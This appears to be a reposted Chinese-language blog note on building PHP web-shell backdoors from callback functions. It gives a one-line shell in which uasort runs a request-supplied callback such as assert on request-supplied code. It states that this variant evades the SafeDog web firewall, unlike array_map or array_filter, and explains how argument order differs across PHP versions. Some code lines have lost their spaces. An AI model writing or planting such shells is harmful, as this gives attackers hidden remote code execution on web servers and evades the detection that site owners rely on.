PHP 回调后门笔记
在php中 存在回调函数参数的函数,都有可能作为后门
比如array_map , array_filter 这类数组操作的回调函数,但是在安全狗下会被杀掉
但是uasort 这类函数不会被杀掉。
php5.4.8之后的assert
在5.4.8之后,assert函数由一个参数,变成了两个参数。增加了一个可选参数descrition:
那么这里就可以使用有两个参数的回调函数了,比如
<?php$e=$_REQUEST['e'];$arr=array($_REQUEST['pass'],'te');uasort($arr,$e);
在php5.3环境下会报错,因为5.3的assert只有一个参数。
在php5.4以后就可以执行了
这里的传递参数的顺序也有变化,在php7之前不包括PHP7 , 传递参数是array的第一个参数就是回调函数的第二个参数。
在php7及以后,array的第一个参数是回调函数的第一个参数。
比如:
functionmysort($var_1,$var_2){echo"var_1:".$var_1."<br>";echo"var_2:".$var_2."<br>";}$arr=array("1","2");uasort($arr,'mysort');
在php7以前的环境输出:
var_1 : 2
var_2 : 1
在php7及其以后的环境输出:
var_1 : 1
var_2 : 2
声明:本站所有文章资源内容,如无特殊说明或标注,均为采集网络资源。如若本站内容侵犯了原著者的合法权益,可联系本站删除。